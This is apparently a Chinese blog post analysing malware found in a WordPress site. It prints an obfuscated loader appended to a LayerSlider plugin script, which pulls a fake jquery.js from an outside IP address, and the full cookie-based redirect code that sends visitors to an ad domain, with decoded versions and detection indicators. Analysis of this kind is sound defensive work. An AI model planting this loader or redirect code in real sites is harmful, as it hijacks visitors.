WordPress劫持代码分析

💡 最近某网站主页打开异常缓慢,并且还有很大概率被劫持到莫名赌博网站,由此发现劫持代码。
上周,浏览公司某网站时发现打开十分困难,且该站是架设于国内,按道理不会有这样的加载速度,并且有很大几率会出现多次跳转,最后跳转到赌博或者杀毒软件的网站。
发现这种情况,第一感觉是wp被劫持了,于是在网站wordpress源文件中找线索,却没发现什么异样。后来通过chrome的network和console发现了一些端倪:在一个名为LayerSlider的插件中,有js文件向document追加了一个外部script。
在编辑器中打开该js,发现文件末尾有一段不一样的操作。

乍一看,全是utf-8编码过后的字符串,但是在之后的代码中能看见有document,嫌疑十分巨大,我们把代码格式化一下。
// Loader found appended to the end of a LayerSlider plugin JS file.
// Each element is an ASCII string written as \x hex escapes, so neither the
// property names nor the injected HTML show up in a plain-text search of the file.
var _0xaae8=[
"", // [0] "" - separator passed to split()/join()
"\x6A\x6F\x69\x6E", // [1] "join"
"\x72\x65\x76\x65\x72\x73\x65", // [2] "reverse"
"\x73\x70\x6C\x69\x74", // [3] "split"
"\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C", // [4] the injected <script ...></script> tag, stored character-reversed (decoded below)
"\x77\x72\x69\x74\x65" // [5] "write"
];
// Resolves to document["write"]( _0xaae8[4]["split"]("")["reverse"]()["join"]("") ):
// the reversed string is flipped back into a <script src=...> tag and written into
// the page, so the browser loads a script from a third-party host (decoded below).
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))让我们转一下码
""
"join"
"reverse"
"split"
">tpircs/<>"sj.yreuqj/87.11.942.431//:ptth"=crs tprcs<"
"write"
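// The same statement as above, with the array indices resolved step by step.
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));
// Step 1: _0xaae8[4] decoded from its \x escapes (the literal must match the hex
// above exactly, otherwise the reversed result below does not come out).
document.write('>tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<'.split('').reverse().join(''));
// Step 2: the reversed literal on its own; evaluating it yields the <script> tag shown below.
'>tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<'.split('').reverse().join('')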
"<script src="http://134.249.116.78/jquery.js"></script>"可以发现这段代码向document写入了一个“jQuery文件” 这就很显而易见了。 打开这个地址

这就很厉害了:它把自己伪装成了真正的jQuery,然而把页面翻到底部,就能看见它的真面目。

//cpm
// Tail of the fake "jquery.js" served from the host above (the rest of the file
// looks like ordinary jQuery). Same \x-escape technique as the loader; the decoded
// value of every entry is given alongside it so the functions below can be read.
var _0xfbe7 = [
"\x67\x65\x74\x54\x69\x6D\x65", // [0] "getTime"
"\x73\x65\x74\x54\x69\x6D\x65", // [1] "setTime"
"\x63\x6F\x6F\x6B\x69\x65", // [2] "cookie"
"\x3D", // [3] "="
"\x3B\x65\x78\x70\x69\x72\x65\x73\x3D", // [4] ";expires="
"\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", // [5] "toGMTString"
"\x3B\x20\x70\x61\x74\x68\x3D", // [6] "; path="
"", // [7] ""
"\x69\x6E\x64\x65\x78\x4F\x66", // [8] "indexOf"
"\x6C\x65\x6E\x67\x74\x68", // [9] "length"
"\x73\x75\x62\x73\x74\x72\x69\x6E\x67", // [10] "substring"
"\x3B", // [11] ";"
"\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64", // [12] "cookieEnabled"
"\x63\x73\x72\x66\x5F\x75\x69\x64\x73", // [13] "csrf_uids" - cookie name, set on the first visit
"\x72\x6F\x69\x5F\x74\x6D\x73", // [14] "roi_tms" - cookie name, set on the second visit
"\x31", // [15] "1"
"\x2F", // [16] "/"
"\x68\x72\x65\x66", // [17] "href"
"\x6C\x6F\x63\x61\x74\x69\x6F\x6E", // [18] "location"
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x70\x6D\x32\x30\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x6B\x65\x79\x3D\x66\x65\x30\x61\x39\x33\x39\x37\x31\x65\x39\x39\x33\x66\x30\x35\x39\x64\x37\x61\x37\x38\x62\x66\x32\x66\x61\x35\x31\x31\x37\x61", // [19] "https://www.cpm20.com/watch?key=fe0a93971e993f059d7a78bf2fa5117a" - redirect target on the second visit
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x70\x6D\x32\x30\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x6B\x65\x79\x3D\x37\x38\x39\x61\x34\x31\x32\x39\x65\x37\x38\x63\x30\x30\x30\x30\x38\x61\x34\x37\x62\x33\x36\x65\x32\x33\x64\x36\x35\x65\x61\x37" // [20] "https://www.cpm20.com/watch?key=789a4129e78c00008a47b36e23d65ea7" - redirect target on the first visit
];
/**
 * Decoded: setCookie(name, value, day, path). Writes
 * `name=escape(value);expires=<now + day*24h>[; path=<path>]` to document.cookie.
 * @param {string} _0xdb82x2 cookie name
 * @param {string} _0xdb82x3 cookie value, passed through escape()
 * @param {number|string|null} _0xdb82x4 lifetime in days; null or 0 falls back to 3
 * @param {string} _0xdb82x5 cookie path; the "; path=" part is omitted when falsy
 */
function _mn_(_0xdb82x2, _0xdb82x3, _0xdb82x4, _0xdb82x5) {
var _0xdb82x6 = new Date(); // now
var _0xdb82x7 = new Date(); // expiry, set below
if (_0xdb82x4 === null || _0xdb82x4 === 0) {
_0xdb82x4 = 3
}
; // stray empty statement
// expiry.setTime(now.getTime() + 3600000 * 24 * day). The callers below pass the
// day count as the string "1", so the strict null/0 check above never fires for
// them and the multiplication relies on numeric coercion.
_0xdb82x7[_0xfbe7[1]](_0xdb82x6[_0xfbe7[0]]() + 3600000 * 24 * _0xdb82x4);
// document.cookie = name + "=" + escape(value) + ";expires=" + expiry.toGMTString() + (path ? "; path=" + path : "")
document[_0xfbe7[2]] = _0xdb82x2 + _0xfbe7[3] + escape(_0xdb82x3) + _0xfbe7[4] + _0xdb82x7[_0xfbe7[5]]() + ((_0xdb82x5) ? _0xfbe7[6] + _0xdb82x5 : _0xfbe7[7])
}
/**
 * Decoded: getCookie(name). Looks `name=` up in document.cookie and returns the
 * unescape()d value that follows it, or null when no such cookie is present.
 * Note that indexOf() matches anywhere in the string, so a longer cookie name
 * that merely ends in `name` would also be picked up.
 * @param {string} _0xdb82x9 cookie name
 * @returns {string|null} cookie value, or null
 */
function _nm_(_0xdb82x9) {
var _0xdb82xa = document[_0xfbe7[2]][_0xfbe7[8]](_0xdb82x9 + _0xfbe7[3]); // document.cookie.indexOf(name + "=")
var _0xdb82xb = _0xdb82xa + _0xdb82x9[_0xfbe7[9]] + 1; // start of the value: just past "name="
// indexOf() returning 0 is falsy, so a cookie at the very start of the string is
// re-checked by comparing the prefix (document.cookie.substring(0, name.length));
// with an index of 0 that prefix always equals name, so this guard never fires.
if ((!_0xdb82xa) && (_0xdb82x9 != document[_0xfbe7[2]][_0xfbe7[10]](0, _0xdb82x9[_0xfbe7[9]]))) {
return null
}
; // stray empty statement
if (_0xdb82xa == -1) {
return null
}
; // stray empty statement
var _0xdb82xc = document[_0xfbe7[2]][_0xfbe7[8]](_0xfbe7[11], _0xdb82xb); // next ";" after the value
if (_0xdb82xc == -1) {
_0xdb82xc = document[_0xfbe7[2]][_0xfbe7[9]] // last cookie in the string: run to document.cookie.length
}
; // stray empty statement
return unescape(document[_0xfbe7[2]][_0xfbe7[10]](_0xdb82xb, _0xdb82xc)) // document.cookie.substring(start, end)
}
// Entry point, run once when the fake jquery.js loads. A browser is redirected on
// its first two visits only (while the two cookies set here are alive, about a
// day each); with both cookies present the script does nothing. That matches the
// intermittent redirects described above, and the two cookie names plus the
// external script host are the concrete indicators to search for elsewhere.
if (navigator[_0xfbe7[12]]) { // navigator.cookieEnabled
if (_nm_(_0xfbe7[13]) == 1) { // getCookie("csrf_uids") == 1 : not the first visit
if (_nm_(_0xfbe7[14]) == 1) { // getCookie("roi_tms") == 1 : already redirected twice, stay quiet
} else {
_mn_(_0xfbe7[14], _0xfbe7[15], _0xfbe7[15], _0xfbe7[16]); // setCookie("roi_tms", "1", "1", "/")
window[_0xfbe7[18]][_0xfbe7[17]] = _0xfbe7[19] // window.location.href = second redirect target ([19])
}
} else {
_mn_(_0xfbe7[13], _0xfbe7[15], _0xfbe7[15], _0xfbe7[16]); // setCookie("csrf_uids", "1", "1", "/")
window[_0xfbe7[18]][_0xfbe7[17]] = _0xfbe7[20] // window.location.href = first redirect target ([20])
}
}//cpm
// Decoded form of the _0xfbe7 table above: index N here is the literal that the
// readable setCookie/getCookie/entry code below uses directly. Kept for
// cross-reference only; the decoded functions no longer index into it.
var _0xfbe7 = [
"getTime", // [0]
"setTime", // [1]
"cookie", // [2]
"=", // [3]
";expires=", // [4]
"toGMTString", // [5]
"; path=", // [6]
"", // [7]
"indexOf", // [8]
"length", // [9]
"substring", // [10]
";", // [11]
"cookieEnabled", // [12]
"csrf_uids", // [13] cookie set on the first visit
"roi_tms", // [14] cookie set on the second visit
"1", // [15]
"/", // [16]
"href", // [17]
"location", // [18]
"https://www.cpm20.com/watch?key=fe0a93971e993f059d7a78bf2fa5117a", // [19] redirect target on the second visit
"https://www.cpm20.com/watch?key=789a4129e78c00008a47b36e23d65ea7" // [20] redirect target on the first visit
];
/**
 * Writes `name=escape(value);expires=<now + day*24h>[; path=<path>]` to document.cookie.
 * @param {string} name cookie name
 * @param {string} value cookie value, passed through the legacy escape()
 * @param {number|string|null} day lifetime in days; null or 0 falls back to 3
 * @param {string} path cookie path; the "; path=" part is omitted when falsy
 */
function setCookie(name, value, day, path) {
var date1 = new Date(); // now
var date2 = new Date(); // expiry, set below
if (day === null || day === 0) {
day = 3
}
// The callers below pass day as the string '1', so the strict null/0 check never
// fires for them and the multiplication relies on numeric coercion.
date2.setTime(date1.getTime() + 3600000 * 24 * day);
document.cookie = name + '=' + escape(value) + ';expires=' + date2.toGMTString() + ((path) ? '; path=' + path : '');
}
/**
 * Looks `name=` up in document.cookie and returns the unescape()d value that
 * follows it, or null when no such cookie is present. indexOf() matches anywhere
 * in the string, so a longer cookie name that merely ends in `name` also matches.
 * @param {string} name cookie name
 * @returns {string|null} cookie value, or null
 */
function getCookie(name) {
var _0xdb82xa = document.cookie.indexOf(name + '='); // position of "name=", or -1
var _0xdb82xb = _0xdb82xa + name.length + 1; // start of the value: just past "name="
// indexOf() returning 0 is falsy, so a cookie at the very start of the string is
// re-checked by comparing the prefix; with an index of 0 that prefix always
// equals name, so this guard never actually returns.
if ((!_0xdb82xa) && (name != document.cookie.substring(0, name.length))) {
return null
}
if (_0xdb82xa == -1) {
return null
}
var _0xdb82xc = document.cookie.indexOf(';', _0xdb82xb); // next ";" after the value
if (_0xdb82xc == -1) {
_0xdb82xc = document.cookie.length; // last cookie in the string: run to the end
}
return unescape(document.cookie.substring(_0xdb82xb, _0xdb82xc))
}
// Entry point, run once when the fake jquery.js loads. Each browser is redirected
// on its first two visits only (while the cookies set here are alive, about a day
// each); once both cookies exist the script stays silent. That explains why the
// hijack looked intermittent, and the cookie names csrf_uids / roi_tms together
// with the external script host are the indicators worth searching for.
if (navigator.cookieEnabled) {
if (getCookie('csrf_uids') == 1) { // not the first visit
if (getCookie('roi_tms') == 1) { // already redirected twice: do nothing
} else {
setCookie('roi_tms', '1', '1', '/'); // second visit: mark it and redirect
window.location.href = 'https://www.cpm20.com/watch?key=fe0a93971e993f059d7a78bf2fa5117a';
}
} else {
setCookie('csrf_uids', '1', '1', '/'); // first visit: mark it and redirect
window.location.href = 'https://www.cpm20.com/watch?key=789a4129e78c00008a47b36e23d65ea7';
}
}可以看到该段代码使用了cookie来记录访问者以导向不同页面。
来源分析

一番google之后,发现这个注入的代码应该是源自php批处理。
由于只在插件中找到了这样的注入代码,猜测是插件管理员在发布更新时误上传了被注入的代码所致。不过这只是推测:即便只有插件文件被改动,也可能是站点本身被入侵后写入的;建议把该文件与插件官方发布版本做比对,并检查服务器上是否还有其他被改动的文件。